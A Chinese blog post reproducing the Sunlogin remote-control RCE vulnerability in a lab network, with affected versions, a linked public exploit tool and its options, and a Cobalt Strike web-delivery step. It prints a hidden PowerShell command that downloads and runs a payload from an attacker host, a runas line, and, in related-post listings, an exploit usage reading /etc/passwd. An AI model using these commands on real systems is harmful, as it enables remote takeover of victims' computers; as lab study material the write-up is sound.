向日葵RCE(CNVD-2022-10270/CNVD-2022-03672)

已于 2022-04-19 16:30:21 修改
阅读量1.1k 收藏 7
点赞数
分类专栏: 安全渗透 文章标签: 渗透测试
于 2022-03-19 11:23:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43795682/article/details/123590814
版权

目录

漏洞描述:

工具复现:

CS服务器上线:(失败)

漏洞描述:

上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。

影响版本:

向日葵个人版   for Windows <= 11.0.0.33
向日葵简约版   <= V1.0.1.43315(2021.12)

工具复现:

同一局域网:
攻击机:172.52.3.214
客户机PC:192.168.29.152

工具下载:向日葵漏洞工具https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

-h 指定目标
-t 选择扫描或者命令执行 默认scan
-p 设置扫描端口范围 默认4w到65535
-c 需要执行的命令

客户机PC: 

攻击机PC:

使用工具进行扫描:(向日葵端口在40000-60000之间,所以可以直接指定端口)

命令执行:

CS服务器上线:(失败)

CS服务器中选择攻击-Web钓鱼-Web投递——设置端口、监听器

Payload生成:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.29.130:444/a'))"

进入客户端cmd输入即可上线

测试时发现,通过向日葵漏洞无法通过远程cmd执行上线(可能权限不够)

进行提权:切换administrator用户:

runas /noprofile /user:Administrator cmd

还是不行,可能因为”符号被windows内部重复处理了

客户机直接cmd测试:

CS成功上线:

张星星9527
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
weblogic_rce:cve2019_2725,CNVD-C-2019-48814 Weblogic _async远程命令执行exp
03-15
CNVD-C-2019-48814,CVE-2019-2725 Weblogic _async远程命令执行exp 主要代码基于js实现。 Linux Payload使用Jason,Windows Payload修改为10271,执行java.lang.Runtime。 环境需求 Windows的所有版本。 用法 cve2019-2725_weblogic_rce.bat http://192.168.31.5:7001 "cat /etc/passwd" 漏洞信息 接触
CVE-2021-34473 Exchange RCE.MD
04-23
CVE-2021-34473 Exchange RCE
向日葵漏洞复现(含批量验证poc)(1),2024年最新网络安全程序员怎么优雅迈过30K+这道坎
最新发布
时间与思念
04-16 371
可以走的很快,但一群人才能走的更远!当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。最后就是大家最关心的网络安全面试题板块。
测试向日葵客户端漏洞版本:11.0.0.33826
03-05
测试向日葵客户端漏洞版本:11.0.0.33826
rce-website:RCE网站
05-09
RCE网站 RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。 本地安装 安装Python3( 完美运行) 安装Pelican和支持库 pip install invoke==1.4.1 pip install pelican==3.7.1 pip install markdown==3.1.1 如果要在更改后部署网站,请另外安装 pip install ghp-import==0.5.5 部署需要对存储库写权限。 克隆此存储库 配置 在fabfile.py为本地测试设置适当的端口以在您的计算机上fabfile.py # Port for `serve` PORT = 8001 建造 生成网站 invoke build 启动本地服务器进行测试(可通过)。 invoke serve 这不会在更改后重建网站,这意味着您必须手动停止本地服务器,使用invoke bu
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
CNVD-2022-10207:向日葵RCE
chang113的博客
06-20 4202
CNVD-2022-10207:向日葵RCE
【权限提升】利用第三方应用Teamviewer&向日葵&Navivat-凭据
今天是几号的博客
02-18 672
远控类 利用向日葵漏洞提权 漏洞版本百度云链接 搭建: 为追求真实服务器环境,采用阿里云ECS弹性服务器搭建靶场(windows server2012 + phpstudy) 背景: 已有webshell权限,利用探针(查看端口,进程等)知道服务器安装了向日葵服务 tasklist /svc提权工具-CS 上传后门,会连会话,这里由于搭建原因忽悠是administrator权限,当做是普通用户权限,且无法正常提权至系统权限 利用CS插件上传向日葵提权工具 上传 执行 机器密文就是验证码,使用Python高版
向日葵RCE后续利用之本地提权
weixin_45794666的博客
02-27 1171
根据玄武实验室的文章 https://github.com/Ryze-T/CNVD-2022-10270-LPE 找到目标日志文件 cd /d c:/ dir /S sunlogin_service* 向日葵日志文件 sunlogin_service.20220226-171345.log 复现 安装.NET 4 https://www.microsoft.com/zh-cn/download/details.aspx?id=17718 在运行,发现需要指定路径路径,而我在win7下目录为 C:
向日葵RCE原理解析——基于逆向工程的静态分析技术
lmboss的博客
03-06 731
向日葵RCE原理解析——基于逆向工程的静态分析技术
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
【漏洞复现】CNVD-2022-10270向日葵远程代码执行
weixin_45527514的博客
03-01 1380
向日葵远程控制是上海贝锐信息科技股份有限公司开发的一款提供远程控制服务的软件。CVND在2022年2月15日公开了向日葵存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
向日葵RCE
m0_64338211的博客
03-01 1998
CNVD-2022-10270/CNVD-2022-03672 向日葵RCE复现 1. 我们先安装漏洞版本的向日葵也就是<=11.0.0.33版本的, 2. 打开向日葵,连接服务器成功才可以 3. 打开之后会自动开启一个端口(40000-60000)之间随机的,我们扫描一下端口(查看安装向日葵电脑的ip) 4. 浏览器访问ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)一个一个端口尝试 5. 拿到CID-添加paylo..
远程桌面的端口号是多少?
热门推荐
Mr_Moone的博客
06-19 1万+
远程桌面(Remote Desktop)是一种用于远程访问和控制计算机的技术,它允许用户通过网络连接到远程计算机并以图形化界面进行操作。远程桌面使用的端口号通常是3389。
Sunlogin_rce-main向日葵漏洞复现测试
m0_73615178的博客
02-17 378
版本。
网络攻防|一次实战中的向日葵 RCE Bypass 360
weixin_42282189的博客
07-03 1215
点击上方蓝字关注我们在做攻防项目的时候发现了一个外网的向日葵命令执行但由于存在杀软,无法执行命令下面就来说一下我是如何绕过杀软拿到shell的自己搭了一个虚拟机,也是存在漏洞的向日葵命令执行,环境配置和目标一样,但没装360(后面会说是如何获得目标系统信息的)开始测试,发现首先我通过向日葵和杀软允许的命令判断确认是存在命令执行漏洞的通过网上搜索各种文章,晓得是利用向日葵不禁止命令,然后通过进行目录穿越来执行任意命令的。目标机器上的杀软实际上是禁止调用和等危险的进程,其他exe程序并没有禁止所以我们可以利用或
CNVD-2022-03672/CNVD-2022-10270向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
一只爱吃橙子的羊
03-31 6949
CNVD-2022-03672/CNVD-2022-10270向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
CVE-2022-29464
07-28
回答: CVE-2022-29464是WSO2文件上传漏洞的漏洞编号。该漏洞是一种未经身份验证的无限制任意文件上传漏洞,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得远程命令执行(RCE)的权限。\[3\]攻击者可以利用该漏洞上传恶意的JSP文件,并通过执行任意命令来控制服务器。这个漏洞的具体利用方式是通过在HTTP POST请求中上传恶意文件来实现的。\[2\]一旦攻击者成功利用该漏洞,他们可以执行任意命令,可能导致服务器被完全控制。因此,对于使用受影响版本的WSO2的用户来说,修复该漏洞是非常重要的。 #### 引用[.reference_title] - *1* *3* [【春秋云境】CVE-2022-29464](https://blog.csdn.net/m0_49025459/article/details/130400369)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)](https://blog.csdn.net/FODKING/article/details/125746993)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值